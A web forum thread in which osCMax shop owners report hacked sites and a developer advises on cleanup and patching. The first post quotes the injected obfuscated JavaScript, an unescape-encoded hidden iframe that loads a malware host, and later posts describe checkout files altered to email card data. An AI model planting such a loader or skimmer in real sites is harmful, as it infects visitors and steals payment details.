Full service web hosting, great prices and support. Starts at $1.99/month!
Page 1 of 2 12 LastLast
Results 1 to 10 of 20

Thread: Website Recently Hacked

  1. #1
    deju
    Guest


    Default Website Recently Hacked

    My Oscmax based site was recently hacked and a javascript redirect inserted in the index.php file. A friend of mine, also with an Oscmax website (which is currently not in use), also has an oscmax site, which has also been compromised by the same hack.
    If you go to http://www.cuddlyslippers.com using Internet Explorer, you can see the hack in action. It redirects to a different site after a few seconds:
    Code:
    http://liveinternetstatistics.ws/package/getfile.php?f=vispdf
    The hacked redirect only manifests itself when viewing the site through Microsoft Internet Explorer, not Firefox, however if you view the source code, you can see the hacked code which has been added to the file:
    Code:
    <html><body><script  type="text/javascript">
    document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%6C%69%76%65%69%6E%74%65%72%6E%65%74%73%74%61%74%69%73%74%69%63%73%2E%77%73%2F%70%61%63%6B%61%67%65%2F%27%20%77%69%64%74%68%3D%27%31%27%20%68%65%69%67%68%74%3D%27%31%27%20%73%74%79%6C%65%3D%27%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%27%3E%3C%2F%69%66%72%61%6D%65%3E'));
    </script></body></html>
    Does anyone have an idea how the index.php has been hacked? Any help in preventing any such attacks in the future would be greatly appreciated!

  2. #2
    osCMax Developer


    Website Recently Hacked


    Join Date
    Jul 2002
    Location
    Phoenix, AZ
    Posts
    23,134
    Contribute If you enjoy reading the
    content here, click the below
    image to support our site.
    Click Here To Contribute To Our Site

    Total Contributions For

    michael_s     $ 10.00
    Rep Power
    597


    Default Re: Website Recently Hacked

    First,

    make sure your code is the latest osCMax 2.0 RC3.0.2 code. Next, there are several exploits out there that are very sophisticated and do not rely on a direct attack on your site, but an indirect attack. Your computer gets infected with a virus/trojan/malware from visiting another infected web site. This virus sends your FTP passwords (and other passwords) to a repository where they are then used to automatically login to your FTP server, download and replace the files with infected copies. Yes, this is how it happens. I have seen it. The only way to prevent re-hacking of your site is to find and clean the infected computer that you are using, and change all your passwords.

    A quick search over at osCommerce.com will find a post with a lot of details about it:
    Hacker warning - osCommerce Community Support Forums

    Of course, there are about a half dozen other methods that could be used if your code is not updated to RC3.0.2.

    So, to recap here is what you need to do:

    1. Fully scan/clean all computers that you use to access your site via FTP
    2. Install a software firewall/malware-spyware blocker
    3. Change all your passwords
    4. Update your website's code to the latest osCMax release version.

  3. #3
    deju
    Guest


    Default Re: Website Recently Hacked

    Hi Michael,

    Thanks for the great advice. I've also come across a number of useful posts relating to oscommerce security in general, which some people might be interested in:

    How to secure an Oscommerce site

    How to secure your site. - osCommerce Community Support Forums

    Securing Your Oscommerce Install

    [tip] Securing your osCommerce install - osCommerce Forums

  4. #4
    heatherk
    Guest


    Default Re: Website Recently Hacked

    it appears that several sites I created with oscmax 2 rc 2 and 3 were hacked. I've found at least 4, I thought that they were up to date with the security fixes, but I'll have to go back through them. The index files were updated to force people to put their dob in at checkout, and in one, that wasn't setup to accept credit cards, the paypal file was changed so that credit card information had to be put in. My question is, how do I figure out if they are pulling or getting the credit card information as it's being input - obviously on the one with the changed paypal file they must have been, otherwise why change that file. For the other three sites, they are all setup with authorize.net - if the authorize.net transaction is going through does this mean that it is ok and that the cc information is not being pulled?

  5. #5
    osCMax Developer


    Website Recently Hacked


    Join Date
    Jul 2002
    Location
    Phoenix, AZ
    Posts
    23,134
    Contribute If you enjoy reading the
    content here, click the below
    image to support our site.
    Click Here To Contribute To Our Site

    Total Contributions For

    michael_s     $ 10.00
    Rep Power
    597


    Default Re: Website Recently Hacked

    First, check the dates on the files. If they were modified recently, check them. Compare against a stock file and look for changes. Inspect the differences closely.

    Look in checkout_process.php, and all your payment modules for changes.

  6. #6
    heatherk
    Guest


    Default Re: Website Recently Hacked

    Yes, that is how we realized that the first site was hacked -the paypal.ipn file date was recent. The hack looks like it is similar to the one described in this post:
    http://www.oscmax.com/forums/oscomme...ty-breech.html
    The checkout_process.php file was not changed. Is there a way to tell if the credit card info was being pulled - it's not stored anywhere on the site.

  7. #7
    heatherk
    Guest


    Default Re: Website Recently Hacked

    I found the file - it was checkout_confirmation.php - it ws setup to send all the cc information to someone's email address. So, my next question is how do I go about finding all the security fixes that I need to stop this from happening? At least two of the sites that were hit had the last two security updates applied. But, I clearly have missed some security patches - other than searching through the forums under security - are they listed somewhere?

  8. #8
    heatherk
    Guest


    Default Re: Website Recently Hacked

    More specifically, one of the sites is running oscmax v 2 rc3, and had the xss security patch and the arbitrary upload exploit fix. We are pretty certain that the hacks are not a result of malware or spyware, so where else can I look for the fix that we missed that has created this problem?

  9. #9
    osCMax Developer


    Website Recently Hacked


    Join Date
    Jul 2002
    Location
    Phoenix, AZ
    Posts
    23,134
    Contribute If you enjoy reading the
    content here, click the below
    image to support our site.
    Click Here To Contribute To Our Site

    Total Contributions For

    michael_s     $ 10.00
    Rep Power
    597


    Default Re: Website Recently Hacked

    Upgrade all sites to osCMax 2.0.1 stable. All security fixes are rolled into it.

    Also read my blog posts regarding security holes (link to my blog in my sig.)

  10. #10
    wkdwich
    Guest


    Default Re: Website Recently Hacked

    crap I typed a HUGE detailed response and its all gone.. why does it do that I AM logged in.. but when I went to submit it said I was not.. will redo after dinner..

    and it did it again.. this time tho I put in my user pass instead of clicking back (hoping my disstertation was still there -- which it was not) and at least this posted.. more later

Page 1 of 2 12 LastLast

Similar Threads

  1. Recently Viewed Products(sales optimized)
    By michael_s in forum New osCommerce Contributions
    Replies: 3
    Last Post: 07-05-2009, 05:22 PM
  2. Recently Viewed Products(sales optimized)
    By michael_s in forum New osCommerce Contributions
    Replies: 0
    Last Post: 11-09-2008, 12:01 PM
  3. Recently Viewed Products(sales optimized)
    By michael_s in forum New osCommerce Contributions
    Replies: 0
    Last Post: 11-05-2007, 10:25 PM
  4. Website Hacked - Possible Security Breech
    By robp in forum osCommerce 2.2 Discussion
    Replies: 5
    Last Post: 10-09-2007, 11:49 AM
  5. Site recently moved, Paypal no longer updates
    By chrisbarbers in forum Paypal
    Replies: 0
    Last Post: 09-10-2007, 01:28 PM

Bookmarks

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •